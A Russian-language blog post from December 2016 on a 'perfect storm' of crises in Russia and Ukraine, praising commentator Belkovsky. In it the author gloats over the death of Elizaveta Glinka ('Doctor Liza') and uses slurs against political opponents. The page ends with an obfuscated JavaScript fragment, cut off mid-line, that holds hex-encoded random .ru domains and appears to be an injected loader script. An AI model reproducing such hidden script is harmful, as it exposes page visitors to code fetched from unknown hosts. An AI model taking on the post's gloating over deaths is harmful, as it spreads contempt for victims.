The Perfect Storm и Белковский

29 Декабря 2016 14:56   Просмотров: 5120
Метки: белковский, шендерович, доктор лиза
Нравится Рейтинг поста: 0
Что делать в обстановке "идеального шторма"?




В посте от 26 декабря "В ожидании жареного петуха", в котором шел разговор о некоторых трендах уходящего года и прогнозах на будущее, автор обошел своим вниманием один из ключевых трендов уходящего года, который описывается поэтическим фразеологизмом "The Perfect Storm"

 
Что такое "идеальный шторм"? 

Большинство читателей, полагаю в курсе значения фразеологизма "идеальный шторм". Но не поленюсь процитировать Вики: это ситуация, возникающая в ходе сложения целого комплекса неблагоприятных факторов, в результате чего их суммарный негативный эффект существенно возрастает.   

Чернобыльскую катастрофу 1986 года можно привести в качестве одного из примеров "идеального шторма". Хотя взрыв 4-го реактора ЧАЭС, в свою очередь, являлся пазлом еще более масштабного шторма, приведшего к развалу СССР. 
 
Двойной удар "идеального шторма" по российскому берегу   

Уверен, что умные люди уже догадались -- о чем именно речь пойдет дальше. Ну, во всяком случае, лично для меня вполне очевидно, что убийство российского посла в Турции Андрея Карлова, которое было совершено 19 декабря в Анкаре, и авиакатастрофа военно-транспортного самолета ТУ-154, героически рухнувшего в Черное море 25 декабря – это звенья одной цепи. 

Причем вне зависимости от того – было падение авиалайнера результатом теракта или нелепой случайностью в виде технической неисправности. Молчу уже о наиболее невероятной версии, которую усердно насаждают из Кремля, о критической ошибке в действиях сверхопытного экипажа – поверить в которую способны только тупые "ватники"…   

Но не так для простых обывателей очевидно, что вышеозначенная цепь трагических событий является только невинной прелюдией к дальнейшим проявлениям "идеального шторма". И уже в ближайшем будущем нашего "заклятого стратегического партнера" ждут куда как более масштабные политические, экономические и социальные потрясения…   

И это, как на мой взгляд, есть супер гуд. Ибо Карфаген в лице кремлевского гнезда рашизма таки должен быть разрушен… 
 
Украина также находится внутри "идеального шторма" 
 
Ранее автор уже неоднократно писал о том, что Украина подвержена влиянию деструктивных аттракторов уже четверть века – то бишь, весь период своей государственной независимости. 

И эти перманентные негаразды, в которых Ненька увязла, как лось в трясине, многими, казалось бы неглупыми людьми, объясняется "шлейфом совка". Это не совсем так, ибо современный украинский политикум в своем большинстве состоит как раз из категорических противников "совка". И корень проблемы заключается в том, что по своей натуре украинские политики -- это не созидатели и труженики, а разрушители и паразиты.   

Просто некоторые не шибко умные патриоты никак не могут понять, что словосочетания "создатель коррупционных схем" и "созидатель" – это не синонимы, а антонимы. 

Причем в данном случае под нешибко умными патриотами я подразумеваю не только "припецков", которых ненавижу всеми фибрами своей души, но и "юльков", которым симпатизирую… 

Кстати, знаете -- в чем принципиальная разница между "припецками" и "юльками"? Первые – тупы, как угол в 180 градусов, но циничны и прагматичны, вторые – невзирая на явное наличие высокого интеллекта, "наївні – як діти". Неудивительно, что циничные прагматики выносят иллюзориков "в одну калитку"… 

***   

Только слепец способен не замечать, что полоса политического хаоса, в которую Украина вошла в 2014 году после хероического бегства из страны руководящей шайки донецких бандитов – не только не сузилась, а наоборот – расширилась до линии горизонта. 

И доказать это элементарно. Достаточно сформулировать единственный вопрос: назовите мне четкие сроки возврата оккупированных территорий Донбасса и аннексированного Крыма? 

Какие, блять, четкие сроки – если у барыг во власти отсутствует даже понятный алгоритм решения данных задач!   

Сдается мне, что многие так и не поняли принципиальной разницы между наличием во власти легитимных политиков и наличием во власти созидательно-конструктивных политиков…   

*** 

Ладно, не хочется утомлять читателей своим вниманием к подробностям и мелким деталям. Ограничусь следующим диагнозом и прогнозом: 
1. Украина явно находится в самом эпицентре "идеального шторма". 
2. При таких раскладах может быть только два варианта дальнейшего развития событий: 
-- либо нынешняя власть гарантировано приводит Украину к экономическому коллапсу и развалу; 
-- либо украинский народ похоронит нынешних политиков, сменит политическую систему и, таким образом, их хаоса выйдет уже качественно иная страна. 
 

Как сохранять адекватность в обстановке "идеального шторма"? 

Слова и прогнозы автора о грядущем Майдане 3.0. некоторые читатели совершенно напрасно интерпретируют, как призыв к немедленной постановке палаток и сооружению баррикад.   

Ничего подобного. Ибо лично мне интересен не деструктивный Майдан, а Майдан конструктивный. То бишь во главе его должны стоять общественные лидеры, имеющие понятный и логичный план развития страны. А не горлопаны, призывающие тупо свернуть шеи нынешним барыгам, чтобы затем заняться тем же самым…   

Самая главная мысль заключается в том, что в условиях "идеального шторма" простые граждане глубоко несубъектны. Как ни странно, но главным качеством, необходимым в подобных условиях, является вовсе не жажда каких-либо действий, а сохранение спокойствия и гражданской адекватности.   

Ключевая мысль поста – проста, как угол дома: Если вы хотите настоящей, а не мнимой справедливости, то будьте требовательны и даже жестоки в отношении друзей и союзников, и объективны в отношении действий своих врагов. 
 
Респект Белковскому!   

На сегодня у меня в принципе всё. Просто хотелось бы сказать буквально пару слов в свете "терок" между украинскими патриотами и российскими либералами, когда "под раздачу" попал интеллигентнейший Шендерович за запись в Фейсбуке от 25 декабря: 
 
Ребятки, если кто-то не понял – в каком именно контексте прозвучали слова Шендеровича – то это ваши проблемы, а не его. Даже если вы категорически не согласны с какой-либо его фразой или, скажем, его мнением о Елизавете Поскребышевой (распиаренной Кремлем под псевдо "доктор Лиза"), то это еще не повод третировать Виктора и разбрасываться заявлениями в духе "между нами все порвато и тропинка затоптата". 

Что касается "доктора Лизы" , то как по мне – то туда ей, суке кремлевской, и дорога!


И я респектую Станиславу Белковскому, которые предельно корректно, но четко и ясно высказал свое мнение на её счет в эфире "Дождя". 


Сочувствую телеканалу «Дождь», который был вынужден удалить со своего сайта фрагмент записи программы с участием политолога (в котором тот заявил о моральной ответственности Елизаветы Глинки за войну в Сирии), чтобы не попасть "под раздачу" кремлевских фашистов. 

Смотрим ролик в ю-тубе: https://www.youtube.com/watch?v=IY2hlg2YWIE   

Каюсь, но лично я, в силу своей взрывной эмоциональности, не сумел бы столь блестяще и исчерпывающе ответить. Так что берем пример с умнички Белковского.
window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="28020",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Добавить в:
Армения



ЦентрКомплект